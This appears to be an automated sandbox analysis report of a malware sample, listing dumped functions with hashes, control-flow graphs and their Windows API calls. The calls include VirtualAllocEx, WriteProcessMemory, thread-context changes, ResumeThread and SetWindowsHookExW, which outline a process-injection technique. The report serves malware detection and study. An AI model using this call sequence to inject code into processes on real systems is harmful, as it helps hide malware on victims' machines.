                                          • Instruction ID: 8cce17dae492843e36a618cb578321bb7f6955fe8ce7362e65746fd3c390395b
                                          • Opcode Fuzzy Hash: 23e925da8a5d8b0b6e85f53dbfaa48b41e2912326525aad320418b235b538df1
                                          • Instruction Fuzzy Hash: 6FB14DB0E0020ACFDB28CFADD98579DBBF2BF88314F549529D415EB294EB749845CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02718025 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 170 2718025-27180cc 172 2718105-2718125 170->172 173 27180ce-27180d8 170->173 180 2718127-2718131 172->180 181 271815e-271818a 172->181 173->172 174 27180da-27180dc 173->174 175 27180ff-2718102 174->175 176 27180de-27180e8 174->176 175->172 178 27180ea 176->178 179 27180ec-27180fb 176->179 178->179 179->179 183 27180fd 179->183 180->181 182 2718133-2718135 180->182 189 27181c3-271827d CreateProcessAsUserA 181->189 190 271818c-2718196 181->190 184 2718137-2718141 182->184 185 2718158-271815b 182->185 183->175 187 2718143 184->187 188 2718145-2718154 184->188 185->181 187->188 188->188 191 2718156 188->191 200 2718286-27182fa 189->200 201 271827f-2718285 189->201 190->189 192 2718198-271819a 190->192 191->185 194 27181bd-27181c0 192->194 195 271819c-27181a6 192->195 194->189 196 27181a8 195->196 197 27181aa-27181b9 195->197 196->197 197->197 199 27181bb 197->199 199->194 209 271830a-271830e 200->209 210 27182fc-2718300 200->210 201->200 211 2718310-2718314 209->211 212 271831e-2718322 209->212 210->209 213 2718302-2718305 call 2715f98 210->213 211->212 214 2718316-2718319 call 2715f98 211->214 215 2718332-2718336 212->215 216 2718324-2718328 212->216 213->209 214->212 220 2718348-271834f 215->220 221 2718338-271833e 215->221 216->215 219 271832a-271832d call 2715f98 216->219 219->215 223 2718351-2718360 220->223 224 2718366 220->224 221->220 223->224 225 2718367 224->225 225->225
                                          APIs
                                          • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0271826A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: CreateProcessUser
                                          • String ID:
                                          • API String ID: 2217836671-0
                                          • Opcode ID: c6d7c13f9d2e102fccd2b77287344559c1bafab286c7842211843e1f70483188
                                          • Instruction ID: 505c618d21e1dd6ceb9d4adb9b636967dcbb3440868e3d5ff3b0015c8bc400e0
                                          • Opcode Fuzzy Hash: c6d7c13f9d2e102fccd2b77287344559c1bafab286c7842211843e1f70483188
                                          • Instruction Fuzzy Hash: 8F912A71D00619CFEB25DF69C941BEEBBB2FF48304F0481A9E818A7250DB759985CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02718658 Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 284 2718658-27186b1 286 27186c1-27186fa WriteProcessMemory 284->286 287 27186b3-27186bf 284->287 288 2718703-2718724 286->288 289 27186fc-2718702 286->289 287->286 289->288
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 027186ED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 03ba8f96dd14a20238c56c5f55f053d20ef93618b82072ee20faf52fd21f9e8f
                                          • Instruction ID: b771841f61ae1eed2f08baecbdaf1ae8a585d428568101bd66a83a9c30cb21dc
                                          • Opcode Fuzzy Hash: 03ba8f96dd14a20238c56c5f55f053d20ef93618b82072ee20faf52fd21f9e8f
                                          • Instruction Fuzzy Hash: 022122B19003499FDB10CFAAC985BDEBBF4FF48314F10842AE958A3251D378A954CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02718660 Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 291 2718660-27186b1 293 27186c1-27186fa WriteProcessMemory 291->293 294 27186b3-27186bf 291->294 295 2718703-2718724 293->295 296 27186fc-2718702 293->296 294->293 296->295
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 027186ED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 50d8a365a89649cb60b0ca62c16fa34f99613dbcf53fd0ef0cec0e9193e81b8e
                                          • Instruction ID: fece41f0563ada58ae80558c58a3b8792ac8193648c0400240cf958586c03572
                                          • Opcode Fuzzy Hash: 50d8a365a89649cb60b0ca62c16fa34f99613dbcf53fd0ef0cec0e9193e81b8e
                                          • Instruction Fuzzy Hash: 6321E2B5910349DFDB10CF9AC985BDEBBF4FF48314F10842AE918A3251D378A954CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 027187C0 Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 305 27187c0-2718814 307 2718820-271884f Wow64SetThreadContext 305->307 308 2718816-271881e 305->308 309 2718851-2718857 307->309 310 2718858-2718879 307->310 308->307 309->310
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?), ref: 02718842
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: c5bbe48d6c3a0f95b579c85de024acd6bb4d6dce2a6b447db02287da703d79cf
                                          • Instruction ID: 0cbbb778a3dcc1822676cf37b61127ae6692f27404ed6e0f2f0ee7a20e80d37d
                                          • Opcode Fuzzy Hash: c5bbe48d6c3a0f95b579c85de024acd6bb4d6dce2a6b447db02287da703d79cf
                                          • Instruction Fuzzy Hash: 932115B2D102599FDB10CF9AC985BDEFBF4EB48314F14812AD518A7240D378A954CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02718400 Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 298 2718400-2718454 300 2718460-271848c Wow64GetThreadContext 298->300 301 2718456-271845e 298->301 302 2718495-27184b6 300->302 303 271848e-2718494 300->303 301->300 303->302
                                          APIs
                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0271847F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 9caa05a96bdb3033a2e10bab2542db84fff3ded8709d7f9243b54f23e39b89a9
                                          • Instruction ID: 3229a7f135821fd98e4d35fc4538511580654fc0826657ee3099ab97c7cf221f
                                          • Opcode Fuzzy Hash: 9caa05a96bdb3033a2e10bab2542db84fff3ded8709d7f9243b54f23e39b89a9
                                          • Instruction Fuzzy Hash: 862118B1D002599FDB10CFAAC545BEEFBF4FB48324F14816AD418A3240D7749944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 027187C8 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 317 27187c8-2718814 319 2718820-271884f Wow64SetThreadContext 317->319 320 2718816-271881e 317->320 321 2718851-2718857 319->321 322 2718858-2718879 319->322 320->319 321->322
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?), ref: 02718842
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: b1ba89643574609fbd6b3a42174d136eb8abd4fdc62dfdd0b3e7d1bc870f81bd
                                          • Instruction ID: e33d41f6fe35612f58e219ea926da2871777c9aded3c44283fc8692aac68dbfa
                                          • Opcode Fuzzy Hash: b1ba89643574609fbd6b3a42174d136eb8abd4fdc62dfdd0b3e7d1bc870f81bd
                                          • Instruction Fuzzy Hash: DF21E5B1D102599FDB10CF9AC985B9EFBF4AB48314F14812AD518A3640D378A954CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 027184C0 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 312 27184c0-271854b ReadProcessMemory 314 2718554-2718575 312->314 315 271854d-2718553 312->315 315->314
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0271853E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: bc98f7626cfe5ffa8fef5c8f93795230e6d5e2793147f855c588224ae66b9d63
                                          • Instruction ID: 51ec4faf053e96bbfbd83c7bbacafbcee18121849f02067e7c0e9fa24597b4ed
                                          • Opcode Fuzzy Hash: bc98f7626cfe5ffa8fef5c8f93795230e6d5e2793147f855c588224ae66b9d63
                                          • Instruction Fuzzy Hash: 962124B19002499FDB10CF9AC885ADEBBF5FF48324F14802AE918A3250D379A644CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02718408 Relevance: 1.6, APIs: 1, Instructions: 58threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 324 2718408-2718454 326 2718460-271848c Wow64GetThreadContext 324->326 327 2718456-271845e 324->327 328 2718495-27184b6 326->328 329 271848e-2718494 326->329 327->326 329->328
                                          APIs
                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0271847F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 4ffa39c03ad8b2eac5d7074f5b01e8e36ab14f659828bdc04a3a04f1dd68555c
                                          • Instruction ID: 831ed4275d086f7855824c15a2be7d7f852366f56c1290dfeca0345a6ac3ec9b
                                          • Opcode Fuzzy Hash: 4ffa39c03ad8b2eac5d7074f5b01e8e36ab14f659828bdc04a3a04f1dd68555c
                                          • Instruction Fuzzy Hash: FC21F7B1D106199FDB10CF9AC945B9EFBF4BB48314F14816AD918A3240D778A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 027184C8 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 331 27184c8-271854b ReadProcessMemory 333 2718554-2718575 331->333 334 271854d-2718553 331->334 334->333
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0271853E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 3399c0f3c1cf71c4bfd5a397c3e5162f9780aac83ad66e61d8b7decc64abd59f
                                          • Instruction ID: 0345f9aba69a1a6fc77bd8cf47b2c4a79723c3d19fdc6537db6d446c62349502
                                          • Opcode Fuzzy Hash: 3399c0f3c1cf71c4bfd5a397c3e5162f9780aac83ad66e61d8b7decc64abd59f
                                          • Instruction Fuzzy Hash: 9021F4B59002499FDB10CF9AC984ADEBBF5EF48324F148429E918A3250D379A544DFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 027185B1 Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 336 27185b1-2718630 VirtualAllocEx 338 2718632-2718638 336->338 339 2718639-271864d 336->339 338->339
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02718623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 7cc871a531e24240f80a1f92995f00c10fc0baeed3c1f920a0307a7debc59c59
                                          • Instruction ID: 30484c5e7bef81e324688eda0eda2acb2b300ae7cf8484151bb196cb28d64768
                                          • Opcode Fuzzy Hash: 7cc871a531e24240f80a1f92995f00c10fc0baeed3c1f920a0307a7debc59c59
                                          • Instruction Fuzzy Hash: E21102B59002499FCB20DF9AD985ADEBFF4EF88324F208459E918A7250C375A544CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 027185B8 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02718623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: ba3b8813c61f3988184093fd214676b47b5f9cc394a0f01bb94bcb9e2c112c5c
                                          • Instruction ID: ff3d0e12b22c78f045b45d0c5928449d9ac532edbbd4bd25ae41e6eeaf85bf51
                                          • Opcode Fuzzy Hash: ba3b8813c61f3988184093fd214676b47b5f9cc394a0f01bb94bcb9e2c112c5c
                                          • Instruction Fuzzy Hash: 9E1113B5900249DFCB20CF9AC984BDEBFF8EF48324F208459E518A7250C375A544CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02718888 Relevance: 1.5, APIs: 1, Instructions: 47threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 0dae61944ab55be17f6e235d931fd35d4fd44a4e7fc61bfbd78adf51ba90e142
                                          • Instruction ID: 26143b571ce13fa6277b0bf601775b1e15c3b9266f6dfb7b86a931008cc7c574
                                          • Opcode Fuzzy Hash: 0dae61944ab55be17f6e235d931fd35d4fd44a4e7fc61bfbd78adf51ba90e142
                                          • Instruction Fuzzy Hash: EB1125B1D002498FCB20CF9AC585B9EBFF8EB48324F20845AD518B7240D3756944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02718890 Relevance: 1.5, APIs: 1, Instructions: 45threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 7d2d24cc556d414f7fd800b6d7ec79fab29e9cc923be43a33b90e9a4b5dea77e
                                          • Instruction ID: 666371998f9fdcd6d942dd4a038b403806a40cc2fc272e8043bb1c0731065552
                                          • Opcode Fuzzy Hash: 7d2d24cc556d414f7fd800b6d7ec79fab29e9cc923be43a33b90e9a4b5dea77e
                                          • Instruction Fuzzy Hash: 621103B59003498FDB20DF9AC985B9EBBF8EB88324F208459D518A7240C375A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02740000 Relevance: .0, Instructions: 37COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677520842.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2740000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1129d5acc91f34c88aac1b13e93a474e5b916630846190bd07db3081e01a7fbc
                                          • Instruction ID: 29ef3b4dae0f80d440e1258554852219d5ada10e6cd3646083b27d12cf2b2a20
                                          • Opcode Fuzzy Hash: 1129d5acc91f34c88aac1b13e93a474e5b916630846190bd07db3081e01a7fbc
                                          • Instruction Fuzzy Hash: B4F0486544E3C08FDB2387340D7A854BF706C1710835F95DFC4868F8A3E198988ADBA3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 02714D88 Relevance: .2, Instructions: 238COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2036fbdeeda9a1591dfeb4b636c28e50b92f678e344f421123433820db3b7313
                                          • Instruction ID: 3f184b167a6462b3228ef37a55aa15d7074f2686e81045e54c09bffe76d12698
                                          • Opcode Fuzzy Hash: 2036fbdeeda9a1591dfeb4b636c28e50b92f678e344f421123433820db3b7313
                                          • Instruction Fuzzy Hash: 2F914CB0E002099FDF14CFADD9957EEBBF2AF88714F188129E405A7294EB759845CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:10%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:191
                                          Total number of Limit Nodes:22
                                          execution_graph 23872 2d11c90 23873 2d11c94 23872->23873 23877 2dd7f8f 23873->23877 23881 2dd7fa0 23873->23881 23885 2dd80a8 23873->23885 23879 2dd7fa0 23877->23879 23878 2dd80a6 23878->23873 23879->23878 23889 2dd8130 23879->23889 23883 2dd7fcc 23881->23883 23882 2dd80a6 23882->23873 23883->23882 23884 2dd8130 GlobalMemoryStatusEx 23883->23884 23884->23883 23886 2dd807f 23885->23886 23887 2dd80a6 23886->23887 23888 2dd8130 GlobalMemoryStatusEx 23886->23888 23887->23873 23888->23886 23890 2dd813a 23889->23890 23894 2dd89b0 23890->23894 23898 2dd89a0 23890->23898 23891 2dd8246 23891->23891 23895 2dd89c5 23894->23895 23896 2dd8c64 23895->23896 23902 2dddf68 23895->23902 23896->23891 23900 2dd89b0 23898->23900 23899 2dd8c64 23899->23891 23900->23899 23901 2dddf68 GlobalMemoryStatusEx 23900->23901 23901->23899 23903 2dddf9d 23902->23903 23907 2dde201 23903->23907 23911 2dde210 23903->23911 23904 2dddfff 23904->23896 23908 2dde210 23907->23908 23914 2dde238 23908->23914 23909 2dde21e 23909->23904 23913 2dde238 GlobalMemoryStatusEx 23911->23913 23912 2dde21e 23912->23904 23913->23912 23915 2dde255 23914->23915 23917 2dde27d 23914->23917 23915->23909 23916 2dde29e 23916->23909 23917->23916 23918 2dde366 GlobalMemoryStatusEx 23917->23918 23919 2dde396 23918->23919 23919->23909 24048 2d17380 DuplicateHandle 24049 2d17416 24048->24049 24050 2d11d00 24051 2d11d0f 24050->24051 24054 2d12130 24050->24054 24058 2d12120 24050->24058 24055 2d1214f 24054->24055 24062 2d11d20 24055->24062 24057 2d12175 24057->24057 24059 2d1214f 24058->24059 24060 2d11d20 SetWindowsHookExW 24059->24060 24061 2d12175 24060->24061 24061->24061 24063 2d12280 SetWindowsHookExW 24062->24063 24065 2d1230a 24063->24065 24065->24057 24066 2dd23e8 24067 2dd240e 24066->24067 24071 2dd3158 24067->24071 24076 2dd3148 24067->24076 24072 2dd3185 24071->24072 24073 2dd31b7 24072->24073 24081 2dd36c8 24072->24081 24086 2dd36e8 24072->24086 24077 2dd3158 24076->24077 24078 2dd31b7 24077->24078 24079 2dd36c8 3 API calls 24077->24079 24080 2dd36e8 3 API calls 24077->24080 24079->24078 24080->24078 24083 2dd36e8 24081->24083 24082 2dd3788 24082->24073 24091 2dd378f 24083->24091 24095 2dd37a0 24083->24095 24088 2dd36fc 24086->24088 24087 2dd3788 24087->24073 24089 2dd378f 3 API calls 24088->24089 24090 2dd37a0 3 API calls 24088->24090 24089->24087 24090->24087 24092 2dd37a0 24091->24092 24093 2dd37b1 24092->24093 24098 2dd4955 24092->24098 24093->24082 24096 2dd37b1 24095->24096 24097 2dd4955 3 API calls 24095->24097 24096->24082 24097->24096 24103 2dd493d 24098->24103 24107 2dd4980 24098->24107 24111 2dd4990 24098->24111 24099 2dd497a 24099->24093 24104 2dd494d 24103->24104 24105 2dd49d9 24104->24105 24106 2dd4a2a CallWindowProcW 24104->24106 24105->24099 24106->24105 24108 2dd4990 24107->24108 24109 2dd4a2a CallWindowProcW 24108->24109 24110 2dd49d9 24108->24110 24109->24110 24110->24099 24112 2dd49d2 24111->24112 24114 2dd49d9 24111->24114 24113 2dd4a2a CallWindowProcW 24112->24113 24112->24114 24113->24114 24114->24099 23920 2d17998 23921 2d179c6 23920->23921 23924 2d16f4c 23921->23924 23923 2d179e6 23923->23923 23925 2d16f57 23924->23925 23926 2d1850c 23925->23926 23929 2d1a1a0 23925->23929 23935 2d1a153 23925->23935 23926->23923 23930 2d1a1c1 23929->23930 23931 2d1a1e5 23930->23931 23942 2d1a350 23930->23942 23946 2d1a3a8 23930->23946 23954 2d1a340 23930->23954 23931->23926 23936 2d1a133 23935->23936 23937 2d1a15b 23935->23937 23936->23926 23938 2d1a1e5 23937->23938 23939 2d1a350 6 API calls 23937->23939 23940 2d1a340 6 API calls 23937->23940 23941 2d1a3a8 6 API calls 23937->23941 23938->23926 23939->23938 23940->23938 23941->23938 23943 2d1a35d 23942->23943 23944 2d1a396 23943->23944 23959 2d1817c 23943->23959 23944->23931 23947 2d1a387 23946->23947 23948 2d1a3af 23946->23948 23950 2d1a396 23947->23950 23951 2d1817c 6 API calls 23947->23951 23948->23947 23949 2d1a3b3 23948->23949 23952 2d1a408 23949->23952 23953 2d181b0 6 API calls 23949->23953 23950->23931 23951->23950 23953->23952 23955 2d1a323 23954->23955 23956 2d1a34b 23954->23956 23955->23931 23957 2d1a396 23956->23957 23958 2d1817c 6 API calls 23956->23958 23957->23931 23958->23957 23960 2d18187 23959->23960 23962 2d1a408 23960->23962 23963 2d181b0 23960->23963 23962->23962 23964 2d181bb 23963->23964 23969 2d181c0 23964->23969 23966 2d1a477 23973 2d1fc08 23966->23973 23967 2d1a4b1 23967->23962 23972 2d181cb 23969->23972 23970 2d1b9f8 23970->23966 23971 2d1a1a0 6 API calls 23971->23970 23972->23970 23972->23971 23975 2d1fd39 23973->23975 23976 2d1fc39 23973->23976 23974 2d1fc45 23974->23967 23975->23967 23976->23974 23981 2d1fe80 23976->23981 23977 2d1fc85 23985 2dd1310 23977->23985 23989 2dd130b 23977->23989 23993 2dd0040 23981->23993 24003 2dd0007 23981->24003 23982 2d1fe8a 23982->23977 23986 2dd133b 23985->23986 23987 2dd13ea 23986->23987 24026 2dd21db 23986->24026 23990 2dd133b 23989->23990 23991 2dd13ea 23990->23991 23992 2dd21db 2 API calls 23990->23992 23992->23991 23994 2dd0051 23993->23994 23995 2dd0074 23993->23995 24001 2dd0007 3 API calls 23994->24001 24002 2dd0040 3 API calls 23994->24002 23995->23982 23996 2dd005c 23996->23995 24013 2dd02c8 23996->24013 23997 2dd0278 GetModuleHandleW 23999 2dd02a5 23997->23999 23999->23982 24001->23996 24002->23996 24004 2dd0051 24003->24004 24007 2dd0074 24003->24007 24011 2dd0007 3 API calls 24004->24011 24012 2dd0040 3 API calls 24004->24012 24005 2dd005c 24005->24007 24010 2dd02c8 2 API calls 24005->24010 24006 2dd006c 24006->24007 24008 2dd0278 GetModuleHandleW 24006->24008 24007->23982 24009 2dd02a5 24008->24009 24009->23982 24010->24006 24011->24005 24012->24005 24014 2dd02ec 24013->24014 24015 2dd006c 24014->24015 24018 2dd04b8 24014->24018 24022 2dd04b1 24014->24022 24015->23995 24015->23997 24019 2dd04fa 24018->24019 24020 2dd0500 LoadLibraryExW 24018->24020 24019->24020 24021 2dd0531 24020->24021 24021->24015 24023 2dd04b8 LoadLibraryExW 24022->24023 24025 2dd0531 24023->24025 24025->24015 24030 2dd2224 24026->24030 24034 2dd2230 24026->24034 24031 2dd2230 CreateWindowExW 24030->24031 24033 2dd2354 24031->24033 24035 2dd2298 CreateWindowExW 24034->24035 24037 2dd2354 24035->24037 24038 2d17138 24039 2d1717e GetCurrentProcess 24038->24039 24041 2d171d0 GetCurrentThread 24039->24041 24042 2d171c9 24039->24042 24043 2d17206 24041->24043 24044 2d1720d GetCurrentProcess 24041->24044 24042->24041 24043->24044 24047 2d17243 24044->24047 24045 2d1726b GetCurrentThreadId 24046 2d1729c 24045->24046 24047->24045

                                          Executed Functions

                                          Function 02D17128 Relevance: 6.1, APIs: 4, Instructions: 136threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 128 2d17128-2d171c7 GetCurrentProcess 132 2d171d0-2d17204 GetCurrentThread 128->132 133 2d171c9-2d171cf 128->133 134 2d17206-2d1720c 132->134 135 2d1720d-2d17241 GetCurrentProcess 132->135 133->132 134->135 136 2d17243-2d17249 135->136 137 2d1724a-2d17265 call 2d17309 135->137 136->137 141 2d1726b-2d1729a GetCurrentThreadId 137->141 142 2d172a3-2d17305 141->142 143 2d1729c-2d172a2 141->143 143->142
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 02D171B6
                                          • GetCurrentThread.KERNEL32 ref: 02D171F3
                                          • GetCurrentProcess.KERNEL32 ref: 02D17230
                                          • GetCurrentThreadId.KERNEL32 ref: 02D17289
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136481061.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2d10000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: 10543d96841bdf3cdd6315d2066dd25ab9f21723e4de886508b037909c3fdfc2
                                          • Instruction ID: 08ee4a0fc241749338478678379a9eb7aae58c6450c7c1ab73aba01af2f3c1da
                                          • Opcode Fuzzy Hash: 10543d96841bdf3cdd6315d2066dd25ab9f21723e4de886508b037909c3fdfc2
                                          • Instruction Fuzzy Hash: 7E5164B0A003099FDB14CFA9E948BAEBBF1EF48314F24C45AE408A7760D7346D85CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02D17138 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
